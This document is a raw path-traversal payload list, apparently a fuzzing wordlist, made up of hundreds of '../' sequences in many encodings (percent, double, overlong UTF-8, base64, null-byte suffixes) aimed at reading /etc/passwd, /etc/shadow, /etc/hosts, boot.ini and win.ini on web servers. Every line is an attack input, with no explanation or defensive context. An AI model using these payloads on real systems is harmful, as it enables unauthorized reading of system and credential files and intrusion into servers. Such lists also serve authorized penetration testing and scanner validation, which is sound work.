..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
../../../../../../../../../../../../../
../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../
/..\
/..\..\
/..\..\..\
/..\..\..\..\
/..\..\..\..\..\
/..\..\..\..\..\..\
/..\..\..\..\..\..\..\
/..\..\..\..\..\..\..\..\
/..%255c
/..%255c..%255c
/..%255c..%255c..%255c
/..%255c..%255c..%255c..%255c
/..%255c..%255c..%255c..%255c..%255c
/..%255c..%255c..%255c..%255c..%255c..%255c
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c
/..%c0%5cboot.ini
/..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini
/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini
/%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini
/%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini
////%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini
/\\\%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/..//boot.ini
/..//..//boot.ini
/..//..//..//boot.ini
/..//..//..//..//boot.ini
/..//..//..//..//..//boot.ini
/..//..//..//..//..//..//boot.ini
/..//..//..//..//..//..//..//boot.ini
/..//..//..//..//..//..//..//..//boot.ini
/..///boot.ini
/..///..///boot.ini
/..///..///..///boot.ini
/..///..///..///..///boot.ini
/..///..///..///..///..///boot.ini
/..///..///..///..///..///..///boot.ini
/..///..///..///..///..///..///..///boot.ini
/..///..///..///..///..///..///..///..///boot.ini
/..\\boot.ini
/..\\..\\boot.ini
/..\\..\\..\\boot.ini
/..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\..\\..\\..\\boot.ini
/..\\\boot.ini
/..\\\..\\\boot.ini
/..\\\..\\\..\\\boot.ini
/..\\\..\\\..\\\..\\\boot.ini
/..\\\..\\\..\\\..\\\..\\\boot.ini
/..\\\..\\\..\\\..\\\..\\\..\\\boot.ini
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini
/./\/./boot.ini
/./\/././\/./boot.ini
/./\/././\/././\/./boot.ini
/./\/././\/././\/././\/./boot.ini
/./\/././\/././\/././\/././\/./boot.ini
/./\/././\/././\/././\/././\/././\/./boot.ini
/./\/././\/././\/././\/././\/././\/././\/./boot.ini
/./\/././\/././\/././\/././\/././\/././\/././\/./boot.ini
/.\/\.\boot.ini
/.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../boot.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\boot.ini
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\boot.ini
/./../boot.ini
/./.././../boot.ini
/./.././.././../boot.ini
/./.././.././.././../boot.ini
/./.././.././.././.././../boot.ini
/./.././.././.././.././.././../boot.ini
/./.././.././.././.././.././.././../boot.ini
/./.././.././.././.././.././.././.././../boot.ini
/.\..\boot.ini
/.\..\.\..\boot.ini
/.\..\.\..\.\..\boot.ini
/.\..\.\..\.\..\.\..\boot.ini
/.\..\.\..\.\..\.\..\.\..\boot.ini
/.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini
/.//..//boot.ini
/.//..//.//..//boot.ini
/.//..//.//..//.//..//boot.ini
/.//..//.//..//.//..//.//..//boot.ini
/.//..//.//..//.//..//.//..//.//..//boot.ini
/.//..//.//..//.//..//.//..//.//..//.//..//boot.ini
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini
/.\\..\\boot.ini
/.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini
/../boot.ini
/../..//boot.ini
/../..//../boot.ini
/../..//../..//boot.ini
/../..//../..//../boot.ini
/../..//../..//../..//boot.ini
/../..//../..//../..//../boot.ini
/../..//../..//../..//../..//boot.ini
/..\boot.ini
/..\..\\boot.ini
/..\..\\..\boot.ini
/..\..\\..\..\\boot.ini
/..\..\\..\..\\..\boot.ini
/..\..\\..\..\\..\..\\boot.ini
/..\..\\..\..\\..\..\\..\boot.ini
/..\..\\..\..\\..\..\\..\..\\boot.ini
/../..///boot.ini
/../..//..///boot.ini
/../..//../..///boot.ini
/../..//../..//..///boot.ini
/../..//../..//../..///boot.ini
/../..//../..//../..//..///boot.ini
/../..//../..//../..//../..///boot.ini
/..\..\\\boot.ini
/..\..\\..\\\boot.ini
/..\..\\..\..\\\boot.ini
/..\..\\..\..\\..\\\boot.ini
/..\..\\..\..\\..\..\\\boot.ini
/..\..\\..\..\\..\..\\..\\\boot.ini
/..\..\\..\..\\..\..\\..\..\\\boot.ini
C:\WINDOWS\win.ini../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00